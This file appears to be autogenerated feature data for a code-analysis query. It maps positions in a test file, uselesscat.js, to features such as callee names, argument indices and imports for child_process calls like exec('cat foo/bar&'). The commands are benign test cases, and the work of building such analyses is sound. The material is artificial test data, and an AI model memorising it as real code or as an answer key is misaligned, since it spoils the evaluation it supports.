autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:28:100:36 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:42:100:55 | unknownOptions | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:42:100:55 | unknownOptions | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:42:100:55 | unknownOptions | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:42:100:55 | unknownOptions | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:42:100:55 | unknownOptions | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:42:100:55 | unknownOptions | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:1:102:4 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:1:102:4 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:1:102:4 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:1:102:56 | exceptional return of exec("n ... h(out)) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:1:102:56 | exceptional return of exec("n ... h(out)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:1:102:56 | exceptional return of exec("n ... h(out)) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:1:102:56 | exec("n ... h(out)) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:1:102:56 | exec("n ... h(out)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:1:102:56 | exec("n ... h(out)) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:6:102:19 | "node foo/bar" | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:6:102:19 | "node foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:6:102:19 | "node foo/bar" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:6:102:19 | "node foo/bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:6:102:19 | "node foo/bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:6:102:19 | "node foo/bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | 'arguments' object of anonymous function | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | 'arguments' object of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | (err, o ... th(out) | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | (err, o ... th(out) | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | (err, o ... th(out) | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | (err, o ... th(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | (err, o ... th(out) | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | (err, o ... th(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | exceptional return of anonymous function | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | exceptional return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | return of anonymous function | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:22:102:55 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:23:102:25 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:23:102:25 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:23:102:25 | err | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:23:102:25 | err | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:23:102:25 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:28:102:30 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:28:102:30 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:28:102:30 | out | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:28:102:30 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:28:102:30 | out | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:28:102:30 | out | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:28:102:30 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:28:102:30 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:28:102:30 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:28:102:30 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:50 | doSomethingWith | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:50 | doSomethingWith | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:50 | doSomethingWith | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:50 | doSomethingWith | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:50 | doSomethingWith | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:55 | doSomethingWith(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:55 | doSomethingWith(out) | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:55 | doSomethingWith(out) | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:55 | doSomethingWith(out) | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:55 | doSomethingWith(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:55 | exceptional return of doSomethingWith(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:55 | exceptional return of doSomethingWith(out) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:55 | exceptional return of doSomethingWith(out) | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:55 | exceptional return of doSomethingWith(out) | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:55 | exceptional return of doSomethingWith(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:52:102:54 | out | CalleeFlexibleAccessPath | doSomethingWith | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:52:102:54 | out | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:52:102:54 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:52:102:54 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:52:102:54 | out | enclosingFunctionBody | err out doSomethingWith out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:52:102:54 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:52:102:54 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:1:104:12 | execFileSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:1:104:12 | execFileSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:1:104:12 | execFileSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:1:104:31 | exceptional return of execFil ... cat` ]) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:1:104:31 | exceptional return of execFil ... cat` ]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:1:104:31 | exceptional return of execFil ... cat` ]) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:1:104:31 | execFil ... cat` ]) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:1:104:31 | execFil ... cat` ]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:1:104:31 | execFil ... cat` ]) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:14:104:19 | 'node' | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:14:104:19 | 'node' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:14:104:19 | 'node' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:14:104:19 | 'node' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:14:104:19 | 'node' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:14:104:19 | 'node' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:22:104:30 | [ `cat` ] | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:22:104:30 | [ `cat` ] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:22:104:30 | [ `cat` ] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:22:104:30 | [ `cat` ] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:22:104:30 | [ `cat` ] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:22:104:30 | [ `cat` ] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:24:104:28 | `cat` | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:24:104:28 | `cat` | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:24:104:28 | `cat` | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:24:104:28 | `cat` | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:24:104:28 | `cat` | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:24:104:28 | `cat` | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:25:104:27 | cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:25:104:27 | cat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:25:104:27 | cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:25:104:27 | cat | stringConcatenatedWith | -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:1:106:4 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:1:106:4 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:1:106:4 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:1:106:44 | exceptional return of exec("c ... ut) {}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:1:106:44 | exceptional return of exec("c ... ut) {}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:1:106:44 | exceptional return of exec("c ... ut) {}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:1:106:44 | exec("c ... ut) {}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:1:106:44 | exec("c ... ut) {}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:1:106:44 | exec("c ... ut) {}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:6:106:19 | "cat foo/bar&" | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:6:106:19 | "cat foo/bar&" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:6:106:19 | "cat foo/bar&" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:6:106:19 | "cat foo/bar&" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:6:106:19 | "cat foo/bar&" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:6:106:19 | "cat foo/bar&" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:21 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:21 | this | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:21 | this | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:21 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | 'arguments' object of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | 'arguments' object of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | exceptional return of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | exceptional return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | functio ... out) {} | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | functio ... out) {} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | functio ... out) {} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | functio ... out) {} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | functio ... out) {} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | functio ... out) {} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | return of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:22:106:43 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:32:106:34 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:32:106:34 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:32:106:34 | err | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:32:106:34 | err | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:32:106:34 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:37:106:39 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:37:106:39 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:37:106:39 | out | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:37:106:39 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:37:106:39 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:1:107:4 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:1:107:4 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:1:107:4 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:1:107:44 | exceptional return of exec("c ... ut) {}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:1:107:44 | exceptional return of exec("c ... ut) {}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:1:107:44 | exceptional return of exec("c ... ut) {}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:1:107:44 | exec("c ... ut) {}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:1:107:44 | exec("c ... ut) {}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:1:107:44 | exec("c ... ut) {}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:6:107:19 | "cat foo/bar," | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:6:107:19 | "cat foo/bar," | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:6:107:19 | "cat foo/bar," | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:6:107:19 | "cat foo/bar," | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:6:107:19 | "cat foo/bar," | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:6:107:19 | "cat foo/bar," | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:21 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:21 | this | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:21 | this | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:21 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | 'arguments' object of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | 'arguments' object of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | 